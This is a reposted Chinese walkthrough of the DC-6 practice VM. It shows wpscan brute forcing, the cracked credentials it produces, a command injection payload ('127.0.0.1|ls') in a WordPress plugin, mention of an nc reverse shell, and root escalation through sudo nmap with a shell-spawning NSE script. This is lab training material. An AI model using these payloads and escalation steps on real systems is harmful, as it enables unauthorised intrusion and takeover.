DC-6靶机测试渗透详细教程

这篇具有很好参考价值的文章主要介绍了DC-6靶机测试渗透详细教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1、首先扫描我们要渗透机器的IP

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

2、 接着我们扫描IP的端口和操作系统

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 我们扫到目标机的80端口开启了,我们进行查看目标机的80端口。(我做过实验,所以不可以直接访问)因此我们需要进行给靶机的IP和域名进行绑定,然后再进行访问

 靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全 

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 发现没有任何注入点

3、接着我们使用kali中dirsearch进行目录扫描

dirsearch -u "http://wordy/"

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

http://wordy/wp-login.php

我们可以发现有一个登录界面

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 有登录界面后,我们可以进行用户枚举使用kali自带的wpscan命令

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 我们可以把这几个用户名保存在txt文件中

然后我们可以进行密码爆破,因为从官方下载这个镜像,我们可以看到提示密码需要进行过滤

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

解压/usr/share/wordlists/rockyou.txt.gz

gzip -d xxx.gz

然后我们接着使用wpscan进行爆破密码

wpscan --url http://wordy/ -U dc6user.txt -P pwd.txt

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

mark helpdesk01

我们进行登录发现Activity monitor插件有一个命令执行

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 我们可以查看这个命令执行是否有漏洞

输入:127.0.0.1|ls

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

因为有了漏洞后我们可以使用nc进行反弹shell

 靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 建立交互式环境

python -c 'import pty;pty.spawn("/bin/bash")'

4、进行提权

首先查看能不能进行suid进行提权

发现没有可进行提权的地方

我们再使用sudo -l进行查看一下

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 发现需要密码也无法进行提权

最后我们可以尝试去查看/etc/passwd看看可疑的用户

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 发现有四个用户我们可以到目录下进行查看

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 我们发现mark下有文件,然后发现有graham的密码

GSo7isUM1D4

因为之前有22端口打开,所以我们可以进行ssh登录

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 我们发现jens可以无密码使用backups.sh

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 在这个文件中发现#!/bin/bash,所以我们可以进行提权

所以我们添加/bin/bash,并使用jens进行执行

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 发现自动给我交换了身份

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 再次使用sudo -l发现root可以无密码使用nmap,所以我们可以使用nmap进行提权

由于nmap是可以执行脚本的,我们把root的shell放入脚本里让nmap执行也就相当于获取了root的权限,nmap可以执行nse的shell文件

echo 'os.execute("/bin/sh")' >getshell.nse #写一个root shell的文件

sudo nmap --script=getshell.nse #运行

靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 靶机渗透教程,DC靶机,安全,web安全,密码学,网络安全

 文章来源地址https://www.toymoban.com/news/detail-580375.html

到了这里,关于DC-6靶机测试渗透详细教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023年广东省网络安全竞赛——Web 渗透测试解析(超级详细)

    任务环境说明: √ 服务器场景:Server03 √ 服务器场景操作系统:未知(关闭连接) 通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag 提交(如:点击超链接查看上传文

    2023年04月08日
    浏览(57)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(49)
  • 【web安全】渗透测试实战思路

    1. 不建议太小的公司(可能都是请别人来开发的,用现成成熟的框架) 2. 不建议一线大厂:腾讯,字节,阿里等,你懂的 3. 不建议政府部门,安全设备多,每年有护网,报警你就死 建议:找上市公司与子公司,有开发人员,就有漏洞 重点:先在天眼查那些找域名 所有上市

    2024年02月19日
    浏览(58)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(45)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(40)
  • DC-3渗透实战(详细过程)

    目录 DC-3靶机 1.主机发现 2.端口扫描 3.网页信息探测 4.敏感目录扫描 5.漏洞查找和漏洞利用 漏洞查找 joomscan searchsploit 漏洞利用 sqlmap John 反弹shell 交互式shell 6.收集信息 7.主机渗透 系统漏洞查找 exp提权 DC-3靶场下载地址http://www.five86.com/downloads/DC-3-2.zip 安装按照我DC-1的文章 如

    2024年02月07日
    浏览(36)
  • Web安全-渗透测试-基础知识02

    无代理服务器 Request请求数据包 Reponse相应数据包 有代理服务器 Requeset请求数据包 Proxy代理服务器 Reponse相应数据包 代理的出现在接受数据包和发送数据包的时候提供了修改数据包的机会 总结: 建立连接——发送请求数据包——返回响应数据包——关闭连接 定义: HTTP协议是超

    2024年02月07日
    浏览(47)
  • Web安全-渗透测试-基础知识01

    定义: 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的互联网上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识. 因为ip地址不方便记忆.而且不能显示地址组织的名称和性质,所以用域名也可以定位到响应的up,可简单理解为是ip地址

    2024年02月07日
    浏览(64)
  • Web安全——渗透测试基础知识上

    1、Web安全——HTML基础 2、Web安全——DIV CSS基础 3、Web安全——JavaScript基础 4、Web安全——PHP基础 5、Web安全——JavaScript基础(加入案例) 6、靶场搭建——搭建pikachu靶场 7、Web安全——数据库mysql学习 黑客测试 行业术语扫盲(hack方面) 所谓“肉鸡”是一种很形象的比喻,比

    2024年02月13日
    浏览(52)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包